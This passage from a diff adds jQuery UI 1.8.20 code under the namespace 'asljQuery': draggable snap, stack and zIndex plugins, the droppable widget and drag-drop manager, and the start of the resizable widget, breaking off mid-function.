if(!o.axis || o.axis != 'y') {
|
1419 |
+
if((i.overflowOffset.left + i.scrollParent[0].offsetWidth) - event.pageX < o.scrollSensitivity)
|
1420 |
+
i.scrollParent[0].scrollLeft = scrolled = i.scrollParent[0].scrollLeft + o.scrollSpeed;
|
1421 |
+
else if(event.pageX - i.overflowOffset.left < o.scrollSensitivity)
|
1422 |
+
i.scrollParent[0].scrollLeft = scrolled = i.scrollParent[0].scrollLeft - o.scrollSpeed;
|
1423 |
+
}
|
1424 |
+
|
1425 |
+
} else {
|
1426 |
+
|
1427 |
+
if(!o.axis || o.axis != 'x') {
|
1428 |
+
if(event.pageY - $(document).scrollTop() < o.scrollSensitivity)
|
1429 |
+
scrolled = $(document).scrollTop($(document).scrollTop() - o.scrollSpeed);
|
1430 |
+
else if($(window).height() - (event.pageY - $(document).scrollTop()) < o.scrollSensitivity)
|
1431 |
+
scrolled = $(document).scrollTop($(document).scrollTop() + o.scrollSpeed);
|
1432 |
+
}
|
1433 |
+
|
1434 |
+
if(!o.axis || o.axis != 'y') {
|
1435 |
+
if(event.pageX - $(document).scrollLeft() < o.scrollSensitivity)
|
1436 |
+
scrolled = $(document).scrollLeft($(document).scrollLeft() - o.scrollSpeed);
|
1437 |
+
else if($(window).width() - (event.pageX - $(document).scrollLeft()) < o.scrollSensitivity)
|
1438 |
+
scrolled = $(document).scrollLeft($(document).scrollLeft() + o.scrollSpeed);
|
1439 |
+
}
|
1440 |
+
|
1441 |
+
}
|
1442 |
+
|
1443 |
+
if(scrolled !== false && $.ui.ddmanager && !o.dropBehaviour)
|
1444 |
+
$.ui.ddmanager.prepareOffsets(i, event);
|
1445 |
+
|
1446 |
+
}
|
1447 |
+
});
|
1448 |
+
|
1449 |
+
$.ui.plugin.add("draggable", "snap", {
|
1450 |
+
start: function(event, ui) {
|
1451 |
+
|
1452 |
+
var i = $(this).data("draggable"), o = i.options;
|
1453 |
+
i.snapElements = [];
|
1454 |
+
|
1455 |
+
$(o.snap.constructor != String ? ( o.snap.items || ':data(draggable)' ) : o.snap).each(function() {
|
1456 |
+
var $t = $(this); var $o = $t.offset();
|
1457 |
+
if(this != i.element[0]) i.snapElements.push({
|
1458 |
+
item: this,
|
1459 |
+
width: $t.outerWidth(), height: $t.outerHeight(),
|
1460 |
+
top: $o.top, left: $o.left
|
1461 |
+
});
|
1462 |
+
});
|
1463 |
+
|
1464 |
+
},
|
1465 |
+
drag: function(event, ui) {
|
1466 |
+
|
1467 |
+
var inst = $(this).data("draggable"), o = inst.options;
|
1468 |
+
var d = o.snapTolerance;
|
1469 |
+
|
1470 |
+
var x1 = ui.offset.left, x2 = x1 + inst.helperProportions.width,
|
1471 |
+
y1 = ui.offset.top, y2 = y1 + inst.helperProportions.height;
|
1472 |
+
|
1473 |
+
for (var i = inst.snapElements.length - 1; i >= 0; i--){
|
1474 |
+
|
1475 |
+
var l = inst.snapElements[i].left, r = l + inst.snapElements[i].width,
|
1476 |
+
t = inst.snapElements[i].top, b = t + inst.snapElements[i].height;
|
1477 |
+
|
1478 |
+
//Yes, I know, this is insane ;)
|
1479 |
+
if(!((l-d < x1 && x1 < r+d && t-d < y1 && y1 < b+d) || (l-d < x1 && x1 < r+d && t-d < y2 && y2 < b+d) || (l-d < x2 && x2 < r+d && t-d < y1 && y1 < b+d) || (l-d < x2 && x2 < r+d && t-d < y2 && y2 < b+d))) {
|
1480 |
+
if(inst.snapElements[i].snapping) (inst.options.snap.release && inst.options.snap.release.call(inst.element, event, $.extend(inst._uiHash(), { snapItem: inst.snapElements[i].item })));
|
1481 |
+
inst.snapElements[i].snapping = false;
|
1482 |
+
continue;
|
1483 |
+
}
|
1484 |
+
|
1485 |
+
if(o.snapMode != 'inner') {
|
1486 |
+
var ts = Math.abs(t - y2) <= d;
|
1487 |
+
var bs = Math.abs(b - y1) <= d;
|
1488 |
+
var ls = Math.abs(l - x2) <= d;
|
1489 |
+
var rs = Math.abs(r - x1) <= d;
|
1490 |
+
if(ts) ui.position.top = inst._convertPositionTo("relative", { top: t - inst.helperProportions.height, left: 0 }).top - inst.margins.top;
|
1491 |
+
if(bs) ui.position.top = inst._convertPositionTo("relative", { top: b, left: 0 }).top - inst.margins.top;
|
1492 |
+
if(ls) ui.position.left = inst._convertPositionTo("relative", { top: 0, left: l - inst.helperProportions.width }).left - inst.margins.left;
|
1493 |
+
if(rs) ui.position.left = inst._convertPositionTo("relative", { top: 0, left: r }).left - inst.margins.left;
|
1494 |
+
}
|
1495 |
+
|
1496 |
+
var first = (ts || bs || ls || rs);
|
1497 |
+
|
1498 |
+
if(o.snapMode != 'outer') {
|
1499 |
+
var ts = Math.abs(t - y1) <= d;
|
1500 |
+
var bs = Math.abs(b - y2) <= d;
|
1501 |
+
var ls = Math.abs(l - x1) <= d;
|
1502 |
+
var rs = Math.abs(r - x2) <= d;
|
1503 |
+
if(ts) ui.position.top = inst._convertPositionTo("relative", { top: t, left: 0 }).top - inst.margins.top;
|
1504 |
+
if(bs) ui.position.top = inst._convertPositionTo("relative", { top: b - inst.helperProportions.height, left: 0 }).top - inst.margins.top;
|
1505 |
+
if(ls) ui.position.left = inst._convertPositionTo("relative", { top: 0, left: l }).left - inst.margins.left;
|
1506 |
+
if(rs) ui.position.left = inst._convertPositionTo("relative", { top: 0, left: r - inst.helperProportions.width }).left - inst.margins.left;
|
1507 |
+
}
|
1508 |
+
|
1509 |
+
if(!inst.snapElements[i].snapping && (ts || bs || ls || rs || first))
|
1510 |
+
(inst.options.snap.snap && inst.options.snap.snap.call(inst.element, event, $.extend(inst._uiHash(), { snapItem: inst.snapElements[i].item })));
|
1511 |
+
inst.snapElements[i].snapping = (ts || bs || ls || rs || first);
|
1512 |
+
|
1513 |
+
};
|
1514 |
+
|
1515 |
+
}
|
1516 |
+
});
|
1517 |
+
|
1518 |
+
$.ui.plugin.add("draggable", "stack", {
|
1519 |
+
start: function(event, ui) {
|
1520 |
+
|
1521 |
+
var o = $(this).data("draggable").options;
|
1522 |
+
|
1523 |
+
var group = $.makeArray($(o.stack)).sort(function(a,b) {
|
1524 |
+
return (parseInt($(a).css("zIndex"),10) || 0) - (parseInt($(b).css("zIndex"),10) || 0);
|
1525 |
+
});
|
1526 |
+
if (!group.length) { return; }
|
1527 |
+
|
1528 |
+
var min = parseInt(group[0].style.zIndex) || 0;
|
1529 |
+
$(group).each(function(i) {
|
1530 |
+
this.style.zIndex = min + i;
|
1531 |
+
});
|
1532 |
+
|
1533 |
+
this[0].style.zIndex = min + group.length;
|
1534 |
+
|
1535 |
+
}
|
1536 |
+
});
|
1537 |
+
|
1538 |
+
$.ui.plugin.add("draggable", "zIndex", {
|
1539 |
+
start: function(event, ui) {
|
1540 |
+
var t = $(ui.helper), o = $(this).data("draggable").options;
|
1541 |
+
if(t.css("zIndex")) o._zIndex = t.css("zIndex");
|
1542 |
+
t.css('zIndex', o.zIndex);
|
1543 |
+
},
|
1544 |
+
stop: function(event, ui) {
|
1545 |
+
var o = $(this).data("draggable").options;
|
1546 |
+
if(o._zIndex) $(ui.helper).css('zIndex', o._zIndex);
|
1547 |
+
}
|
1548 |
+
});
|
1549 |
+
|
1550 |
+
})(asljQuery);
|
1551 |
+
|
1552 |
+
(function( $, undefined ) {
|
1553 |
+
|
1554 |
+
$.widget("ui.droppable", {
|
1555 |
+
widgetEventPrefix: "drop",
|
1556 |
+
options: {
|
1557 |
+
accept: '*',
|
1558 |
+
activeClass: false,
|
1559 |
+
addClasses: true,
|
1560 |
+
greedy: false,
|
1561 |
+
hoverClass: false,
|
1562 |
+
scope: 'default',
|
1563 |
+
tolerance: 'intersect'
|
1564 |
+
},
|
1565 |
+
_create: function() {
|
1566 |
+
|
1567 |
+
var o = this.options, accept = o.accept;
|
1568 |
+
this.isover = 0; this.isout = 1;
|
1569 |
+
|
1570 |
+
this.accept = $.isFunction(accept) ? accept : function(d) {
|
1571 |
+
return d.is(accept);
|
1572 |
+
};
|
1573 |
+
|
1574 |
+
//Store the droppable's proportions
|
1575 |
+
this.proportions = { width: this.element[0].offsetWidth, height: this.element[0].offsetHeight };
|
1576 |
+
|
1577 |
+
// Add the reference and positions to the manager
|
1578 |
+
$.ui.ddmanager.droppables[o.scope] = $.ui.ddmanager.droppables[o.scope] || [];
|
1579 |
+
$.ui.ddmanager.droppables[o.scope].push(this);
|
1580 |
+
|
1581 |
+
(o.addClasses && this.element.addClass("ui-droppable"));
|
1582 |
+
|
1583 |
+
},
|
1584 |
+
|
1585 |
+
destroy: function() {
|
1586 |
+
var drop = $.ui.ddmanager.droppables[this.options.scope];
|
1587 |
+
for ( var i = 0; i < drop.length; i++ )
|
1588 |
+
if ( drop[i] == this )
|
1589 |
+
drop.splice(i, 1);
|
1590 |
+
|
1591 |
+
this.element
|
1592 |
+
.removeClass("ui-droppable ui-droppable-disabled")
|
1593 |
+
.removeData("droppable")
|
1594 |
+
.unbind(".droppable");
|
1595 |
+
|
1596 |
+
return this;
|
1597 |
+
},
|
1598 |
+
|
1599 |
+
_setOption: function(key, value) {
|
1600 |
+
|
1601 |
+
if(key == 'accept') {
|
1602 |
+
this.accept = $.isFunction(value) ? value : function(d) {
|
1603 |
+
return d.is(value);
|
1604 |
+
};
|
1605 |
+
}
|
1606 |
+
$.Widget.prototype._setOption.apply(this, arguments);
|
1607 |
+
},
|
1608 |
+
|
1609 |
+
_activate: function(event) {
|
1610 |
+
var draggable = $.ui.ddmanager.current;
|
1611 |
+
if(this.options.activeClass) this.element.addClass(this.options.activeClass);
|
1612 |
+
(draggable && this._trigger('activate', event, this.ui(draggable)));
|
1613 |
+
},
|
1614 |
+
|
1615 |
+
_deactivate: function(event) {
|
1616 |
+
var draggable = $.ui.ddmanager.current;
|
1617 |
+
if(this.options.activeClass) this.element.removeClass(this.options.activeClass);
|
1618 |
+
(draggable && this._trigger('deactivate', event, this.ui(draggable)));
|
1619 |
+
},
|
1620 |
+
|
1621 |
+
_over: function(event) {
|
1622 |
+
|
1623 |
+
var draggable = $.ui.ddmanager.current;
|
1624 |
+
if (!draggable || (draggable.currentItem || draggable.element)[0] == this.element[0]) return; // Bail if draggable and droppable are same element
|
1625 |
+
|
1626 |
+
if (this.accept.call(this.element[0],(draggable.currentItem || draggable.element))) {
|
1627 |
+
if(this.options.hoverClass) this.element.addClass(this.options.hoverClass);
|
1628 |
+
this._trigger('over', event, this.ui(draggable));
|
1629 |
+
}
|
1630 |
+
|
1631 |
+
},
|
1632 |
+
|
1633 |
+
_out: function(event) {
|
1634 |
+
|
1635 |
+
var draggable = $.ui.ddmanager.current;
|
1636 |
+
if (!draggable || (draggable.currentItem || draggable.element)[0] == this.element[0]) return; // Bail if draggable and droppable are same element
|
1637 |
+
|
1638 |
+
if (this.accept.call(this.element[0],(draggable.currentItem || draggable.element))) {
|
1639 |
+
if(this.options.hoverClass) this.element.removeClass(this.options.hoverClass);
|
1640 |
+
this._trigger('out', event, this.ui(draggable));
|
1641 |
+
}
|
1642 |
+
|
1643 |
+
},
|
1644 |
+
|
1645 |
+
_drop: function(event,custom) {
|
1646 |
+
|
1647 |
+
var draggable = custom || $.ui.ddmanager.current;
|
1648 |
+
if (!draggable || (draggable.currentItem || draggable.element)[0] == this.element[0]) return false; // Bail if draggable and droppable are same element
|
1649 |
+
|
1650 |
+
var childrenIntersection = false;
|
1651 |
+
this.element.find(":data(droppable)").not(".ui-draggable-dragging").each(function() {
|
1652 |
+
var inst = $.data(this, 'droppable');
|
1653 |
+
if(
|
1654 |
+
inst.options.greedy
|
1655 |
+
&& !inst.options.disabled
|
1656 |
+
&& inst.options.scope == draggable.options.scope
|
1657 |
+
&& inst.accept.call(inst.element[0], (draggable.currentItem || draggable.element))
|
1658 |
+
&& $.ui.intersect(draggable, $.extend(inst, { offset: inst.element.offset() }), inst.options.tolerance)
|
1659 |
+
) { childrenIntersection = true; return false; }
|
1660 |
+
});
|
1661 |
+
if(childrenIntersection) return false;
|
1662 |
+
|
1663 |
+
if(this.accept.call(this.element[0],(draggable.currentItem || draggable.element))) {
|
1664 |
+
if(this.options.activeClass) this.element.removeClass(this.options.activeClass);
|
1665 |
+
if(this.options.hoverClass) this.element.removeClass(this.options.hoverClass);
|
1666 |
+
this._trigger('drop', event, this.ui(draggable));
|
1667 |
+
return this.element;
|
1668 |
+
}
|
1669 |
+
|
1670 |
+
return false;
|
1671 |
+
|
1672 |
+
},
|
1673 |
+
|
1674 |
+
ui: function(c) {
|
1675 |
+
return {
|
1676 |
+
draggable: (c.currentItem || c.element),
|
1677 |
+
helper: c.helper,
|
1678 |
+
position: c.position,
|
1679 |
+
offset: c.positionAbs
|
1680 |
+
};
|
1681 |
+
}
|
1682 |
+
|
1683 |
+
});
|
1684 |
+
|
1685 |
+
$.extend($.ui.droppable, {
|
1686 |
+
version: "1.8.20"
|
1687 |
+
});
|
1688 |
+
|
1689 |
+
$.ui.intersect = function(draggable, droppable, toleranceMode) {
|
1690 |
+
|
1691 |
+
if (!droppable.offset) return false;
|
1692 |
+
|
1693 |
+
var x1 = (draggable.positionAbs || draggable.position.absolute).left, x2 = x1 + draggable.helperProportions.width,
|
1694 |
+
y1 = (draggable.positionAbs || draggable.position.absolute).top, y2 = y1 + draggable.helperProportions.height;
|
1695 |
+
var l = droppable.offset.left, r = l + droppable.proportions.width,
|
1696 |
+
t = droppable.offset.top, b = t + droppable.proportions.height;
|
1697 |
+
|
1698 |
+
switch (toleranceMode) {
|
1699 |
+
case 'fit':
|
1700 |
+
return (l <= x1 && x2 <= r
|
1701 |
+
&& t <= y1 && y2 <= b);
|
1702 |
+
break;
|
1703 |
+
case 'intersect':
|
1704 |
+
return (l < x1 + (draggable.helperProportions.width / 2) // Right Half
|
1705 |
+
&& x2 - (draggable.helperProportions.width / 2) < r // Left Half
|
1706 |
+
&& t < y1 + (draggable.helperProportions.height / 2) // Bottom Half
|
1707 |
+
&& y2 - (draggable.helperProportions.height / 2) < b ); // Top Half
|
1708 |
+
break;
|
1709 |
+
case 'pointer':
|
1710 |
+
var draggableLeft = ((draggable.positionAbs || draggable.position.absolute).left + (draggable.clickOffset || draggable.offset.click).left),
|
1711 |
+
draggableTop = ((draggable.positionAbs || draggable.position.absolute).top + (draggable.clickOffset || draggable.offset.click).top),
|
1712 |
+
isOver = $.ui.isOver(draggableTop, draggableLeft, t, l, droppable.proportions.height, droppable.proportions.width);
|
1713 |
+
return isOver;
|
1714 |
+
break;
|
1715 |
+
case 'touch':
|
1716 |
+
return (
|
1717 |
+
(y1 >= t && y1 <= b) || // Top edge touching
|
1718 |
+
(y2 >= t && y2 <= b) || // Bottom edge touching
|
1719 |
+
(y1 < t && y2 > b) // Surrounded vertically
|
1720 |
+
) && (
|
1721 |
+
(x1 >= l && x1 <= r) || // Left edge touching
|
1722 |
+
(x2 >= l && x2 <= r) || // Right edge touching
|
1723 |
+
(x1 < l && x2 > r) // Surrounded horizontally
|
1724 |
+
);
|
1725 |
+
break;
|
1726 |
+
default:
|
1727 |
+
return false;
|
1728 |
+
break;
|
1729 |
+
}
|
1730 |
+
|
1731 |
+
};
|
1732 |
+
|
1733 |
+
/*
|
1734 |
+
This manager tracks offsets of draggables and droppables
|
1735 |
+
*/
|
1736 |
+
$.ui.ddmanager = {
|
1737 |
+
current: null,
|
1738 |
+
droppables: { 'default': [] },
|
1739 |
+
prepareOffsets: function(t, event) {
|
1740 |
+
|
1741 |
+
var m = $.ui.ddmanager.droppables[t.options.scope] || [];
|
1742 |
+
var type = event ? event.type : null; // workaround for #2317
|
1743 |
+
var list = (t.currentItem || t.element).find(":data(droppable)").andSelf();
|
1744 |
+
|
1745 |
+
droppablesLoop: for (var i = 0; i < m.length; i++) {
|
1746 |
+
|
1747 |
+
if(m[i].options.disabled || (t && !m[i].accept.call(m[i].element[0],(t.currentItem || t.element)))) continue; //No disabled and non-accepted
|
1748 |
+
for (var j=0; j < list.length; j++) { if(list[j] == m[i].element[0]) { m[i].proportions.height = 0; continue droppablesLoop; } }; //Filter out elements in the current dragged item
|
1749 |
+
m[i].visible = m[i].element.css("display") != "none"; if(!m[i].visible) continue; //If the element is not visible, continue
|
1750 |
+
|
1751 |
+
if(type == "mousedown") m[i]._activate.call(m[i], event); //Activate the droppable if used directly from draggables
|
1752 |
+
|
1753 |
+
m[i].offset = m[i].element.offset();
|
1754 |
+
m[i].proportions = { width: m[i].element[0].offsetWidth, height: m[i].element[0].offsetHeight };
|
1755 |
+
|
1756 |
+
}
|
1757 |
+
|
1758 |
+
},
|
1759 |
+
drop: function(draggable, event) {
|
1760 |
+
|
1761 |
+
var dropped = false;
|
1762 |
+
$.each($.ui.ddmanager.droppables[draggable.options.scope] || [], function() {
|
1763 |
+
|
1764 |
+
if(!this.options) return;
|
1765 |
+
if (!this.options.disabled && this.visible && $.ui.intersect(draggable, this, this.options.tolerance))
|
1766 |
+
dropped = this._drop.call(this, event) || dropped;
|
1767 |
+
|
1768 |
+
if (!this.options.disabled && this.visible && this.accept.call(this.element[0],(draggable.currentItem || draggable.element))) {
|
1769 |
+
this.isout = 1; this.isover = 0;
|
1770 |
+
this._deactivate.call(this, event);
|
1771 |
+
}
|
1772 |
+
|
1773 |
+
});
|
1774 |
+
return dropped;
|
1775 |
+
|
1776 |
+
},
|
1777 |
+
dragStart: function( draggable, event ) {
|
1778 |
+
//Listen for scrolling so that if the dragging causes scrolling the position of the droppables can be recalculated (see #5003)
|
1779 |
+
draggable.element.parents( ":not(body,html)" ).bind( "scroll.droppable", function() {
|
1780 |
+
if( !draggable.options.refreshPositions ) $.ui.ddmanager.prepareOffsets( draggable, event );
|
1781 |
+
});
|
1782 |
+
},
|
1783 |
+
drag: function(draggable, event) {
|
1784 |
+
|
1785 |
+
//If you have a highly dynamic page, you might try this option. It renders positions every time you move the mouse.
|
1786 |
+
if(draggable.options.refreshPositions) $.ui.ddmanager.prepareOffsets(draggable, event);
|
1787 |
+
|
1788 |
+
//Run through all droppables and check their positions based on specific tolerance options
|
1789 |
+
$.each($.ui.ddmanager.droppables[draggable.options.scope] || [], function() {
|
1790 |
+
|
1791 |
+
if(this.options.disabled || this.greedyChild || !this.visible) return;
|
1792 |
+
var intersects = $.ui.intersect(draggable, this, this.options.tolerance);
|
1793 |
+
|
1794 |
+
var c = !intersects && this.isover == 1 ? 'isout' : (intersects && this.isover == 0 ? 'isover' : null);
|
1795 |
+
if(!c) return;
|
1796 |
+
|
1797 |
+
var parentInstance;
|
1798 |
+
if (this.options.greedy) {
|
1799 |
+
var parent = this.element.parents(':data(droppable):eq(0)');
|
1800 |
+
if (parent.length) {
|
1801 |
+
parentInstance = $.data(parent[0], 'droppable');
|
1802 |
+
parentInstance.greedyChild = (c == 'isover' ? 1 : 0);
|
1803 |
+
}
|
1804 |
+
}
|
1805 |
+
|
1806 |
+
// we just moved into a greedy child
|
1807 |
+
if (parentInstance && c == 'isover') {
|
1808 |
+
parentInstance['isover'] = 0;
|
1809 |
+
parentInstance['isout'] = 1;
|
1810 |
+
parentInstance._out.call(parentInstance, event);
|
1811 |
+
}
|
1812 |
+
|
1813 |
+
this[c] = 1; this[c == 'isout' ? 'isover' : 'isout'] = 0;
|
1814 |
+
this[c == "isover" ? "_over" : "_out"].call(this, event);
|
1815 |
+
|
1816 |
+
// we just moved out of a greedy child
|
1817 |
+
if (parentInstance && c == 'isout') {
|
1818 |
+
parentInstance['isout'] = 0;
|
1819 |
+
parentInstance['isover'] = 1;
|
1820 |
+
parentInstance._over.call(parentInstance, event);
|
1821 |
+
}
|
1822 |
+
});
|
1823 |
+
|
1824 |
+
},
|
1825 |
+
dragStop: function( draggable, event ) {
|
1826 |
+
draggable.element.parents( ":not(body,html)" ).unbind( "scroll.droppable" );
|
1827 |
+
//Call prepareOffsets one final time since IE does not fire return scroll events when overflow was caused by drag (see #5003)
|
1828 |
+
if( !draggable.options.refreshPositions ) $.ui.ddmanager.prepareOffsets( draggable, event );
|
1829 |
+
}
|
1830 |
+
};
|
1831 |
+
|
1832 |
+
})(asljQuery);
|
1833 |
+
|
1834 |
+
(function( $, undefined ) {
|
1835 |
+
|
1836 |
+
$.widget("ui.resizable", $.ui.mouse, {
|
1837 |
+
widgetEventPrefix: "resize",
|
1838 |
+
options: {
|
1839 |
+
alsoResize: false,
|
1840 |
+
animate: false,
|
1841 |
+
animateDuration: "slow",
|
1842 |
+
animateEasing: "swing",
|
1843 |
+
aspectRatio: false,
|
1844 |
+
autoHide: false,
|
1845 |
+
containment: false,
|
1846 |
+
ghost: false,
|
1847 |
+
grid: false,
|
1848 |
+
handles: "e,s,se",
|
1849 |
+
helper: false,
|
1850 |
+
maxHeight: null,
|
1851 |
+
maxWidth: null,
|
1852 |
+
minHeight: 10,
|
1853 |
+
minWidth: 10,
|
1854 |
+
zIndex: 1000
|
1855 |
+
},
|
1856 |
+
_create: function() {
|
1857 |
+
|
1858 |
+
var self = this, o = this.options;
|
1859 |
+
this.element.addClass("ui-resizable");
|
1860 |
+
|
1861 |
+
$.extend(this, {
|
1862 |
+
_aspectRatio: !!(o.aspectRatio),
|
1863 |
+
aspectRatio: o.aspectRatio,
|
1864 |
+
originalElement: this.element,
|
1865 |
+
_proportionallyResizeElements: [],
|
1866 |
+
_helper: o.helper || o.ghost || o.animate ? o.helper || 'ui-resizable-helper' : null
|
1867 |
+
});
|
1868 |
+
|
1869 |
+
//Wrap the element if it cannot hold child nodes
|
1870 |
+
if(this.element[0].nodeName.match(/canvas|textarea|input|select|button|img/i)) {
|
1871 |
+
|
1872 |
+
//Create a wrapper element and set the wrapper to the new current internal element
|
1873 |
+
this.element.wrap(
|
1874 |
+
$('<div class="ui-wrapper" style="overflow: hidden;"></div>').css({
|
1875 |
+
position: this.element.css('position'),
|
1876 |
+
width: this.element.outerWidth(),
|
1877 |
+
height: this.element.outerHeight(),
|
1878 |
+
top: this.element.css('top'),
|
1879 |
+
left: this.element.css('left')
|
1880 |
+
})
|
1881 |
+
);
|
1882 |
+
|
1883 |
+
//Overwrite the original this.element
|
1884 |
+
this.element = this.element.parent().data(
|
1885 |
+
"resizable", this.element.data('resizable')
|
1886 |
+
);
|
1887 |
+
|
1888 |
+
this.elementIsWrapper = true;
|
1889 |
+
|
1890 |
+
//Move margins to the wrapper
|
1891 |
+
this.element.css({ marginLeft: this.originalElement.css("marginLeft"), marginTop: this.originalElement.css("marginTop"), marginRight: this.originalElement.css("marginRight"), marginBottom: this.originalElement.css("marginBottom") });
|
1892 |
+
this.originalElement.css({ marginLeft: 0, marginTop: 0, marginRight: 0, marginBottom: 0});
|
1893 |
+
|
1894 |
+
//Prevent Safari textarea resize
|
1895 |
+
this.originalResizeStyle = this.originalElement.css('resize');
|
1896 |
+
this.originalElement.css('resize', 'none');
|
1897 |
+
|
1898 |
+
//Push the actual element to our proportionallyResize internal array
|
1899 |
+
this._proportionallyResizeElements.push(this.originalElement.css({ position: 'static', zoom: 1, display: 'block' }));
|
1900 |
+
|
1901 |
+
// avoid IE jump (hard set the margin)
|
1902 |
+
this.originalElement.css({ margin: this.originalElement.css('margin') });
|
1903 |
+
|
1904 |
+
// fix handlers offset
|
1905 |
+
this._proportionallyResize();
|
1906 |
+
|
1907 |
+
}
|
1908 |
+
|
1909 |
+
this.handles = o.handles || (!$('.ui-resizable-handle', this.element).length ? "e,s,se" : { n: '.ui-resizable-n', e: '.ui-resizable-e', s: '.ui-resizable-s', w: '.ui-resizable-w', se: '.ui-resizable-se', sw: '.ui-resizable-sw', ne: '.ui-resizable-ne', nw: '.ui-resizable-nw' });
|
1910 |
+
if(this.handles.constructor == String) {
|
1911 |
+
|
1912 |
+
if(this.handles == 'all') this.handles = 'n,e,s,w,se,sw,ne,nw';
|
1913 |
+
var n = this.handles.split(","); this.handles = {};
|
1914 |
+
|
1915 |
+
for(var i = 0; i < n.length; i++) {
|
1916 |
+
|
1917 |
+
var handle = $.trim(n[i]), hname = 'ui-resizable-'+handle;
|
1918 |
+
var axis = $('<div class="ui-resizable-handle ' + hname + '"></div>');
|
1919 |
+
|
1920 |
+
// Apply zIndex to all handles - see #7960
|
1921 |
+
axis.css({ zIndex: o.zIndex });
|
1922 |
+
|
1923 |
+
//TODO : What's going on here?
|
1924 |
+
if ('se' == handle) {
|
1925 |
+
axis.addClass('ui-icon ui-icon-gripsmall-diagonal-se');
|
1926 |
+
};
|
1927 |
+
|
1928 |
+
//Insert into internal handles object and append to element
|
1929 |
+
this.handles[handle] = '.ui-resizable-'+handle;
|
1930 |
+
this.element.append(axis);
|
1931 |
+
}
|
1932 |
+
|
1933 |
+
}
|
1934 |
+
|
1935 |
+
this._renderAxis = function(target) {
|
1936 |
+
|
1937 |
+
target = target || this.element;
|
1938 |
+
|
1939 |
+
for(var i in this.handles) {
|
1940 |
+
|
1941 |
+
if(this.handles[i].constructor == String)
|
1942 |
+
this.handles[i] = $(this.handles[i], this.element).show();
|
1943 |
+
|
1944 |
+
//Apply pad to wrapper element, needed to fix axis position (textarea, inputs, scrolls)
|
1945 |
+
if (this.elementIsWrapper && this.originalElement[0].nodeName.match(/textarea|input|select|button/i)) {
|
1946 |
+
|
1947 |
+
var axis = $(this.handles[i], this.element), padWrapper = 0;
|
1948 |
+
|
1949 |
+
//Checking the correct pad and border
|
1950 |
+
padWrapper = /sw|ne|nw|se|n|s/.test(i) ? axis.outerHeight() : axis.outerWidth();
|
1951 |
+
|
1952 |
+
//The padding type i have to apply...
|
1953 |
+
var padPos = [ 'padding',
|
1954 |
+
/ne|nw|n/.test(i) ? 'Top' :
|
1955 |
+
/se|sw|s/.test(i) ? 'Bottom' :
|
1956 |
+
/^e$/.test(i) ? 'Right' : 'Left' ].join("");
|
1957 |
+
|
1958 |
+
target.css(padPos, padWrapper);
|
1959 |
+
|
1960 |
+
this._proportionallyResize();
|
1961 |
+
|
1962 |
+
}
|
1963 |
+
|
1964 |
+
//TODO: What's that good for? There's not anything to be executed left
|
1965 |
+
if(!$(this.handles[i]).length)
|
1966 |
+
continue;
|
1967 |
+
|
1968 |
+
}
|
1969 |
+
};
|
1970 |
+
|
1971 |
+
//TODO: make renderAxis a prototype function
|
1972 |
+
this._renderAxis(this.element);
|
1973 |
+
|
1974 |
+
this._handles = $('.ui-resizable-handle', this.element)
|
1975 |
+
.disableSelection();
|
1976 |
+
|
1977 |
+
//Matching axis name
|
1978 |
+
this._handles.mouseover(function() {
|
1979 |
+
if (!self.resizing) {
|
1980 |
+
if (this.className)
|
1981 |
+
var axis = this.className.match(/ui-resizable-(se|sw|ne|nw|n|e|s|w)/i);
|
1982 |
+
//Axis, default = se
|
1983 |
+
self.axis = axis && axis[1] ? axis[1] : 'se';
|
1984 |
+
}
|
1985 |
+
});
|
1986 |
+
|
1987 |
+
//If we want to auto hide the elements
|
1988 |
+
if (o.autoHide) {
|
1989 |
+
this._handles.hide();
|
1990 |
+
$(this.element)
|
1991 |
+
.addClass("ui-resizable-autohide")
|
1992 |
+
.hover(function() {
|
1993 |
+
if (o.disabled) return;
|
1994 |
+
$(this).removeClass("ui-resizable-autohide");
|
1995 |
+
self._handles.show();
|
1996 |
+
},
|
1997 |
+
function(){
|
1998 |
+
if (o.disabled) return;
|
1999 |
+
if (!self.resizing) {
|
2000 |
+
$(this).addClass("ui-resizable-autohide");
|
2001 |
+
self._handles.hide();
|
2002 |
+
}
|
2003 |
+
});
|
2004 |
+
}
|
2005 |
+
|
2006 |
+
//Initialize the mouse interaction
|
2007 |
+
this._mouseInit();
|
2008 |
+
|
2009 |
+
},
|
2010 |
+
|
2011 |
+
destroy: function() {
|
2012 |
+
|
2013 |
+
this._mouseDestroy();
|
2014 |
+
|
2015 |
+
var _destroy = function(exp) {
|
2016 |
+
$(exp).removeClass("ui-resizable ui-resizable-disabled ui-resizable-resizing")
|
2017 |
+
.removeData("resizable").unbind(".resizable").find('.ui-resizable-handle').remove();
|
2018 |
+
};
|
2019 |
+
|
2020 |
+
//TODO: Unwrap at same DOM position
|
2021 |
+
if (this.elementIsWrapper) {
|
2022 |
+
_destroy(this.element);
|
2023 |
+
var wrapper = this.element;
|
2024 |
+
wrapper.after(
|
2025 |
+
this.originalElement.css({
|
2026 |
+
position: wrapper.css('position'),
|
2027 |
+
width: wrapper.outerWidth(),
|
2028 |
+
height: wrapper.outerHeight(),
|
2029 |
+
top: wrapper.css('top'),
|
2030 |
+
left: wrapper.css('left')
|
2031 |
+
})
|
2032 |
+
).remove();
|
2033 |
+
}
|
2034 |
+
|
2035 |
+
this.originalElement.css('resize', this.originalResizeStyle);
|
2036 |
+
_destroy(this.originalElement);
|
2037 |
+
|
2038 |
+
return this;
|
2039 |
+
},
|
2040 |
+
|
2041 |
+
_mouseCapture: function(event) {
|
2042 |
+
var handle = false;
|
2043 |
+
for (var i in this.handles) {
|
2044 |
+
if ($(this.handles[i])[0] == event.target) {
|
2045 |
+
handle = true;
|
2046 |
+
}
|
2047 |
+
}
|
2048 |
+
|
2049 |
+
return !this.options.disabled && handle;
|
2050 |
+
},
|
2051 |
+
|
2052 |
+
_mouseStart: function(event) {
|
2053 |
+
|
2054 |
+
var o = this.options, iniPos = this.element.position(), el = this.element;
|
2055 |
+
|
2056 |
+
this.resizing = true;
|
2057 |
+
this.documentScroll = { top: $(document).scrollTop(), left: $(document).scrollLeft() };
|
2058 |
+
|
2059 |
+
// bugfix for http://dev.jquery.com/ticket/1749
|
2060 |
+
if (el.is('.ui-draggable') || (/absolute/).test(el.css('position'))) {
|
2061 |
+
el.css({ position: 'absolute', top: iniPos.top, left: iniPos.left });
|
2062 |
+
}
|
2063 |
+
|
2064 |
+
this._renderProxy();
|
2065 |
+
|
2066 |
+
var curleft = num(this.helper.css('left')), curtop = num(this.helper.css('top'));
|
2067 |
+
|
2068 |
+
if (o.containment) {
|
